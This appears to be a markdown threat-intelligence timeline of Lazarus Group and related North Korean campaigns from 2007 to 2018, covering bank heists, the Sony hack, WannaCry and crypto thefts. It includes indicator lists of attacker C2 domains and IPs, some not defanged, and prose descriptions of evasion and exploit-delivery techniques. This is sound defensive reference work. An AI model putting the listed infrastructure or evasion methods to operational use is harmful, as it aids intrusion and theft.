lazarus-malware-and-ttps.md

File metadata and controls

4084 lines (3737 loc) · 316 KB

Lazarus Malware, TTPs, and Evolution

2007-2015

Operation Flame

Date:: 2007-07-03 URL:: https://darkreading.com/threat-intelligence/sony-hackers-behind-previous-cyberattacks-tied-to-north-korea-/d/d-id/1324422 Tags:: Details:: Indicators::

Operation Troy DDoS Attacks

Date:: 2009-2012 URL:: https://news.bbc.co.uk/2/hi/asia-pacific/8142282.stm https://theguardian.com/world/2009/jul/11/south-korea-blames-north-korea-cyber-attacks Tags:: Details::

  • Cyber-espionage campaign that utilized unsophisticated DDoS to target the South Korean govt Indicators::

MYDOOM Malware and Dozer Malware DDoS Attacks

Date:: 2009-07-04 URL:: https://usna.edu/CyberCenter/_files/documents/Operation-Blockbuster-Report.pdf Tags:: Details::

  • The Lazarus Group's first major hacking incident took place on July 4, 2009, and sparked the beginning of Operation Troy.
  • This attack utilized the Mydoom and Dozer malware to launch a large-scale, but quite unsophisticated, DDoS attack against US and South Korean websites.
  • The volley of attacks struck about three dozen websites and placed the text "Memory of Independence Day" in the master boot record (MBR). Indicators::

Ten Days of Rain Attacks

Date:: 2011-03-04 URL:: https://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea https://web.archive.org/web/20140602010545/https://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea Tags:: Details::

  • Ten Days of Rain attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.
  • On March 4th, 2011, exactly 20 months to the day after a similar incident on US Independence Day in 2009, a botnet based out of South Korea launched Distributed Denial of Service (DDoS) attacks against 40 sites affiliated with the South Korean government, military and civilian critical infrastructure, as well as U.S. Forces Korea and the U.S. Air Force Base in Kunsan, South Korea. Indicators::

Nonghyup Bank DDoS Attacks

Date:: 2011-04-01 URL:: https://bbc.com/news/world-asia-pacific-13263888 Tags:: Details::

  • Prosecutors said that a laptop used by a subcontractor became in September 2010 a zombie PC operated by the North, which... later remotely staged the attack through the laptop.
  • One of the Internet Protocol (IP) addresses used to break into Nonghyup's system was the same as one used in March for a distributed denial-of-service (DDoS) attack that originated in North Korea, they added.
  • The software used in the incident was also similar to that employed in July 2009, when a number of South Korean government websites were attacked, the prosecutors said.
  • The hackers made the laptop a zombie computer on Sept. 4 in 2010 and managed it for seven months, obtaining inside information and operating the file deletion command remotely, according to the prosecution. Indicators::

Operation Troy / DarkSeoul Attacks

Date:: 2013-03-20 URL:: https://web.archive.org/web/20130818124159/https://mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf Tags:: Details::

  • Wiper attack that targeted three South Korean broadcast companies, financial institutions, and an ISP
  • At the time, two other groups going by the personas "NewRomanic Cyber Army Team" and "WhoIs Team" took credit for that attack
  • The intention of the Dark Seoul adversaries: spy on and disrupt South Korea’s military and government activities.
  • The Troy-era malware is based on the same source code used to create these specialized variants and shares many commonalities, such as bs.dll and payload.dll, which are found consistently throughout the families.
  • The attackers have attempted since 2009 to install the capability to destroy their targets using an MBR wiper component, as seen in the Dark Seoul incident.
  • From our analysis we have established that Operation Troy had a focus from the beginning to gather intelligence on South Korean military targets.
  • We have also linked other high-profile public campaigns conducted over the years against South Korea to Operation Troy, suggesting that a single group is responsible.
  • A news report from the South Korean Arirang TV agency, dated 2016, about an attack on South Korean television stations and banks as part of the DarkSeoul operation. This attack was performed by North Korean hackers and was investigated by South Korea’s National Police Agency, which detected two IP addresses, 175.45.178.19 and 175.45.178.97, used by the hackers to control malware. Both IP addresses are in the same IP address block as 175.45.178.222, which was discovered by Group-IB specialists. Indicators::

Sony Pictures Hack

Date:: 2014-11-24 URL:: https://fbi.gov/news/pressrel/press-releases/update-on-sony-investigation https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details::

  • The attack targeted Sony Pictures Entertainment (SPE) over its comedic film The Interview, which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the supreme leader of North Korea
  • Lazarus targeted individuals and entities associated with the production of The Interview and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
  • Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
  • The same group of subjects also targeted individuals associated with the release of The Interview, among other victims.
  • Perpetrators identified themselves as the Guardians of Peace.
  • Large amounts of data were stolen and slowly leaked in the days following the attack.
  • U.S. investigators say the culprits spent at least two months copying critical files
  • The attack was conducted using malware, including a Server Message Block (SMB) worm tool used to conduct the attacks
  • Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
  • The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
  • On November 24, 2014, previously installed malware rendered many Sony employees' computers inoperable, displaying a warning from a group calling itself the Guardians of Peace, along with a portion of the confidential data taken during the hack.
  • Several Sony-related Twitter accounts were also taken over
  • Park was a North Korean hacker who worked for the country's Reconnaissance General Bureau, the equivalent of the
  • The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
  • https://en.wikipedia.org/wiki/Sony_Pictures_hack Indicators::

Operation Red Dot against South Korean Govt/Defence Co's

Date:: 2014-2015 URL:: https://virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/ Tags:: Details::

  • Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
  • AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
  • The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
  • The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them. Indicators::

Banco del Austro in Ecuador - SWIFT/Bank Heist - $12M

Date:: 2015-01-12 URL:: https://trendmicro.com/vinfo/us/security/news/cyber-attacks/ecuadorean-bank-loses-12m-via-swift https://reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD Tags:: Details::

  • Banco del Austro (BDA) in Ecuador instructed San Francisco-based Wells Fargo to transfer money to bank accounts in Hong Kong. Indicators::

South Korea blames North Korea for December hack on nuclear operator

Date:: 2015-03-17 URL:: https://reuters.com/article/us-nuclear-southkorea-northkorea-idUSKBN0MD0GR20150317/ Tags:: Kimsuky Details:: Indicators::

Bangladesh Bank Employees spear-phished

Date:: 2015-03-30 URL:: https://newyorker.com/magazine/2021/04/26/the-incredible-rise-of-north-koreas-hacking-army Tags:: Details::

  • By March the hackers had a backdoor to the bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence. Indicators::

2016

Multiple spear-phishing campaigns targeting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S. Department of State, and the U.S. Department of Defense

Date:: 2016-2020 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details:: Indicators::

Sony Pictures Hack Report Released: Operation Blockbuster

Date:: 2016-02-01 URL:: https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf Tags:: Details::

  • Joint, two-year-long effort between Kaspersky Lab, AlienVault, Symantec, Invincea, ThreatConnect, Volexity, and PunchCyber Indicators::

A bank in the Philippines attacked

Date:: 2016-02-01 URL:: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8ae1ff71-e440-4b79-9943-199d0adb43fc&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments https://swift.com/insights/press-releases/swift-comments-on-malware-reports https://reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN/ Tags:: Details::

  • Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
  • Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
  • The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a wider and highly adaptive campaign is underway targeting banks.
  • A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
  • Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks was; however, code sharing between Trojan.Banswift (used in the Bangladesh attack to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection. Indicators::

Bangladesh Bank - SWIFT Heist - $81M

Date:: 2016-02-04 URL:: https://en.wikipedia.org/wiki/Bangladesh_Bank_robbery https://reuters.com/investigates/special-report/cyber-heist-federal/ https://reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV/ Tags:: Details::

  • The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Indicators::

BAE Systems Threat Research Blog: Cyber Heist Attribution

Date:: 2016-05-13 URL:: https://baesystemsai.blogspot.com/2016/05/cyber-heist-attribution.html Tags:: Details:: Indicators::

$16M was withdrawn from roughly 1700 7-Eleven ATMs across Japan using data stolen from South Africa’s Standard Bank

Date:: 2016-05-14 URL:: https://darkreading.com/cyberattacks-data-breaches/-13-million-stolen-from-japan-atms-via-stolen-s-african-bank-data Tags:: Details::

  • Police believe over 100 money mules might have been involved in the withdrawals, which took place the morning of May 15. Approximately 14,000 withdrawals were made -- each the maximum amount of 100,000 yen (~$913 US) -- from about 1,400 machines in Tokyo and 16 prefectures in Japan. 7-Eleven stores were hit presumably because they accept foreign credit cards, while many ATMs do not. Indicators::

Tien Phong Bank in Vietnam - SWIFT Heist - $1M

Date:: 2016-05-15 URL:: https://reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN https://threatq.com/threatquotient-blog-mystery-nation/ Tags:: Details::

  • Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist Indicators::

North Korea Linked to Digital Attacks on Global Banks

Date:: 2016-05-26 URL:: https://web.archive.org/web/20160527014048/http://www.nytimes.com/2016/05/27/business/dealbook/north-korea-linked-to-digital-thefts-from-global-banks.html Tags:: Details::

  • In three recent attacks on banks, researchers working for the digital security firm Symantec said, the thieves deployed a rare piece of code that had been seen in only two previous cases: the hacking attack at Sony Pictures in December 2014 and attacks on banks and media companies in South Korea in 2013. Government officials in the United States and South Korea have blamed those attacks on North Korea, though they have not provided independent verification. Indicators::

SWIFT Heists Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks

Date:: 2016-05-27 URL:: https://anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks Tags:: Details:: Indicators::

Operation Daybreak

Date:: 2016-06-17 URL:: https://securelist.com/operation-daybreak/75100/ Tags:: ScarCruft, CVE Details::

  • Flash zero-day exploit deployed by the ScarCruft APT Group
  • Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.
  • In the case of Operation Daybreak, the hacked website hosting the exploit kit performs a couple of browser checks before redirecting the visitor to a server controlled by the attackers hosted in Poland.
  • The main exploit page script contains a BASE64 decoder, as well as rc4 decryption implemented in JS.
  • In the first stage of the attack, the decrypted shellcode executed by the exploit downloads and executes a special DLL file. This is internally called “yay_release.dll”: Indicators::
  • webconncheck.myfw[.]us:8080/8xrss.php
  • 212.7.217[.]10
  • reg.flnet[.]org
  • webconncheck.myfw[.]us

2017

According to the Treasury, NK-affiliated hackers likely stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Date:: 2017-2018 URL:: https://docs.un.org/S/2019/171 Tags:: Money Laundering Details::

  • 2018-09: Indonesian Crypto Company Theft $24.9M
  • 2018-06: Bithumb2 CEX Hack Lazarus $30M
  • 2017-12: YouBit CEX Hack (previously known as Yapizon)
  • 2017-04: Yapizon CEX Hack 3831 BTC Indicators::

Attacks on Polish Banks

Date:: 2017-02-16 URL:: https://trendmicro.com/vinfo/pl/security/news/cyber-attacks/polish-banks-and-other-financial-organizations-hit-by-new-malware-attacks https://pcworld.com/article/411961/polish-banks-on-alert-after-mystery-malware-found-on-computers.html https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/ https://welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/ Tags:: Details::

  • Point of infection was the website of the Polish Financial Supervision Authority, a government watchdog for the banking sector. Independent cybersecurity outfit BadCyber found evidence that the agency’s website has had malicious JavaScript code injected into it since October until a few days ago, when the entire website was taken offline. Indicators::
  • 125.214.195[.]17
  • 196.29.166[.]218
  • sap.misapor[.]ch/vishop/view.jsp?pagenum=1
  • www.eye-watch[.]in/design/fancybox/Pnf.action

Lazarus Under The Hood

Date:: 2017-04-03 URL:: https://securelist.com/lazarus-under-the-hood/77908/ https://csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html Tags:: Details::

  • Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
  • All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
  • We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
  • Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
  • Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. "Keep morphing!" seems to be their internal motto.
  • Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing. Indicators::

Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised

Date:: 2017-04-22 URL:: https://reddit.com/r/Bitcoin/comments/67lamq/yapizon_exchange_korea_got_hacked_lost_3831_btc/ https://cointelegraph.com/news/korean-bitcoin-exchange-yapizon-confirms-5-mln-hack-all-customers-to-pay-with-balances Tags:: Details::

  • It is worth noting that at least some of the tactics, techniques, and procedures that were reportedly employed during this compromise were different from those we have observed in subsequent intrusion attempts, and as of yet there are no clear indications of North Korean involvement
  • The exchange confirmed the theft of 3,831 Bitcoins, “equivalent to 37.08% of the total assets.”
    Indicators::

WannaCry

Date:: 2017-05-12 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and https://arstechnica.com/tech-policy/2017/12/trump-administration-formally-blames-north-korea-for-wannacry-now-what/ https://arstechnica.com/information-technology/2017/05/theres-new-evidence-tying-wcry-ransomware-worm-to-prolific-hacking-group/ https://arstechnica.com/gadgets/2017/08/wannacry-operator-empties-bitcoin-wallets-connected-to-ransomware/ https://arstechnica.com/gadgets/2017/08/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/ https://malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html Tags:: Details::

  • This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
  • Creation of the destructive WannaCry 2.0 ransomware in May 2017
  • The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware. Indicators::

Group IB Report: Lazarus Arisen

Date:: 2017-05-30 URL:: https://group-ib.com/blog/lazarus/ Tags:: Details:: Indicators::

  • 210.52.109.22 China Netcom, 210.52.109.0/24 is assigned to North Korea
  • 175.45.178.222 National Defence Commission
  • 175.45.178.19 Ghost RAT
  • 175.45.178.97 Ghost RAT

CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

Date:: 2017-06-13 URL:: https://us-cert.gov/ncas/alerts/TA17-164A Tags:: Details::

  • This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure. Indicators::

Unit42: Attacks on US defense contractors link back to perpetrators of the Sony Pictures Hack

Date:: 2017-08-14 URL:: https://unit42.paloaltonetworks.com/unit42-blockbuster-saga-continues/ https://unit42.paloaltonetworks.com/unit42-the-blockbuster-sequel/ Tags:: Details::

  • Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors. Indicators::

CISA: DeltaCharlie Attack Malware

Date:: 2017-08-23 URL:: https://cisa.gov/sites/default/files/publications/MAR-10132963.pdf Tags:: Details::

  • STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity. Indicators::

Why Is North Korea So Interested in Bitcoin?

Date:: 2017-09-17 URL:: https://cloud.google.com/blog/topics/threat-intelligence/why-north-korea-interested-in-bitcoin/ Tags:: Details::

  • Now, we may be witnessing a second wave of this campaign: state-sponsored actors seeking to steal bitcoin and other virtual currencies as a means of evading sanctions and obtaining hard currencies to fund the regime. Since May 2017, we have observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds. The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware (PEACHPIT and similar variants) linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016. Indicators::

Stole more than 200GB of South Korean Army data

Date:: 2017-10-09 URL:: https://ft.com/content/d8bbceb0-ad64-11e7-aab9-abaa44b1e130 Tags:: Details::

  • The stolen data included documents known as Operational Plan 5015, a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to decapitate North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, "Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy."
  • April 22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures that were reportedly employed during this compromise were different from those we have observed in subsequent intrusion attempts, and as of yet there are no clear indications of North Korean involvement.)
  • April 26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
  • Early May – Spearphishing against South Korean Exchange #1 begins.
  • Late May – South Korean Exchange #2 compromised via spearphish.
  • Early June – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
  • Early July – South Korean Exchange #3 targeted via spear phishing to personal account. Indicators::

The World Once Laughed at North Korean Cyberpower. No More.

Date:: 2017-10-15 URL:: https://nytimes.com/2017/10/15/world/asia/north-korea-hacking-cyber-sony.html Tags:: Details::

  • The North Korean cyberthreat “crept up on us,” said Robert Hannigan, the former director of Britain’s Government Communications Headquarters, which handles electronic surveillance and cybersecurity. “Because they are such a mix of the weird and absurd and medieval and highly sophisticated, people didn’t take it seriously,” he said. “How can such an isolated, backward country have this capability? Well, how can such an isolated backward country have this nuclear ability?”
  • North Korea began identifying promising students at an early age for special training, sending many to China’s top computer science programs. In the late 1990s, the Federal Bureau of Investigation’s counterintelligence division noticed that North Koreans assigned to work at the United Nations were also quietly enrolling in university computer programming courses in New York. Indicators::

North Korea likely behind Taiwan SWIFT cyber heist -BAE Reuters

Date:: 2017-10-16 URL:: https://www.reuters.com/article/us-cyber-heist-north-korea-taiwan/north-korea-likely-behind-taiwan-swift-cyber-heist-bae-idUSKBN1CL2VO/ Tags:: Details::

  • Cyber-security firm BAE Systems Plc said on Monday it believes the North Korean Lazarus hacking group is likely responsible for a recent cyber heist in Taiwan, the latest in a string of hacks targeting the global SWIFT messaging system. Indicators::

CISA: FALLCHILL and Volgmer Malware

Date:: 2017-11-14 URL:: https://cisa.gov/news-events/alerts/2017/11/14/hidden-cobra-north-korean-remote-administration-tool-fallchill https://cisa.gov/news-events/alerts/2017/11/14/hidden-cobra-north-korean-trojan-volgmer Tags:: Details::

  • CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
  • CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
  • These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity. Indicators::

North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange

Date:: 2017-12-20 URL:: https://arstechnica.com/tech-policy/2017/12/north-korea-suspected-in-latest-bitcoin-heist-bankrupting-youbit-exchange/ Tags:: Details::

  • The attraction of cryptocurrencies to North Korea is fairly obvious. The North Korean regime can access cryptocurrency funds with little fear of running into regulatory roadblocks. And the mounting value of bitcoin delivers high returns on the thefts and obfuscation efforts. Plus, cryptocurrencies are relatively easy to launder, either through the use of coin tumbler services (spreading out the contents of pilfered wallets across multiple smaller transactions to a large collection of other wallets makes tracking their provenance difficult) or by converting them into less easily traceable cryptocurrencies. In the case of the funds collected by the WannaCry worm's associated wallets, the wallets were emptied and apparently exchanged for XMR, the untraceable private digital currency backed by Monero. Indicators::

2018

KillDisk Variant Hits Latin American Financial Groups

Date:: 2018-01-15 URL:: https://trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html Tags:: Details::

  • KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, like in the case of Petya, was a ruse: because KillDisk also overwrites and deletes files (and doesn’t store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant we found, however, does not include a ransom note. Indicators::

Korea In The Crosshairs

Date:: 2018-01-16 URL:: https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html Tags:: CVE, ROKRAT Details::

  • This article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:
  • Golden Time campaign.
  • Evil New Year campaign.
  • Are you Happy? campaign.
  • FreeMilk campaign.
  • North Korean Human Rights campaign.
  • Evil New Year 2018 campaign.
  • On January 2nd of 2018, the Evil New Year 2018 was started. This campaign copies the approach of the 2017 Evil New Year campaign.
  • The email's attachments are two different HWP documents, both leveraging the same vulnerability (CVE-2013-0808). This vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a payload from the Internet. The first email displays a decoy document to the infected user while it downloads the payload
  • The first task of this variant of ROKRAT is to check the operating system version. If Windows XP is detected, the malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems running Windows XP. Additionally, it checks to determine if common analysis tools are currently running on the infected system. If it detects the presence of these tools, the malware performs two network requests to legitimate websites. Indicators::
  • discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg

North Korea Bitten by Bitcoin Bug: Financially motivated campaigns reveal new dimension of the Lazarus Group

Date:: 2018-01-29 URL:: https://proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf Tags:: Details::

  • PowerRatankba, Gh0st RAT, RatankbaPOS
  • btc-gold.us
  • PowerRatankba 51.255.219.82
  • PowerRatankba 144.217.51.246
  • PowerRatankba 158.69.57.135
  • PowerRatankba 198.100.157.239
  • PowerRatankba 201.139.226.67
  • PowerRatankba 92.222.106.229
  • PowerRatankba apps.got-game.org
  • PowerRatankba trade.publicvm.com
  • PowerRatankba www.businesshop.net
  • PowerRatankba vietcasino.linkpc.net
  • coinbases.org
  • africawebcast.com
  • bitforex.linkpc.net
  • macintosh.linkpc.net
  • coinbroker.linkpc.net
  • moneymaker.publicvm.com Indicators::

CVE-2018-4878: Attacks Leveraging Adobe Zero-Day

Date:: 2018-02-02 URL:: https://cloud.google.com/blog/topics/threat-intelligence/attacks-leveraging-adobe-zero-day-cve-2018-4878-threat-attribution-attack-scenario-and-recommendations Tags:: APT37, CVE Details::

  • We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.
  • Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims. Indicators::

Reaper: The Overlooked North Korean Actor

Date:: 2018-02-20 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt37-overlooked-north-korean-actor https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf Tags:: APT37, CVE Details::

  • On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).
  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware. Indicators::

Lazarus: Under The Hood

Date:: 2018-03-07 URL:: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf Tags:: Bluenoroff Details::

  • Bluenoroff: a Child of Lazarus: Clearly, even before the Operation Blockbuster announcement, Lazarus had an enormous budget for its operations and would need a lot of money to run its campaigns. Ironically, Novetta's initiative could have further increased the already rising operating costs of Lazarus attacks, which in turn demanded better financing to continue its espionage and sabotage operations. So, one of the new objectives of Lazarus Group could be to become self-sustaining and to go after money. This is where Bluenoroff, a Lazarus unit, enters the story. Based on our analysis, we believe this unit works within the larger Lazarus Group, reusing its backdoors and leveraging the access it created, while penetrating targets that have large financial streams. Of course it implies a main focus on banks, but banks are not the only companies that are appearing on the radar of Bluenoroff: financial companies, traders and casinos also fall within Bluenoroff’s area of interest. Indicators::

Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant, CVE-2018-4878

Date:: 2018-03-18 URL:: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/ https://www.cisa.gov/news-events/analysis-reports/ar19-252a Tags:: CVE Details::

  • On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.
  • Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.
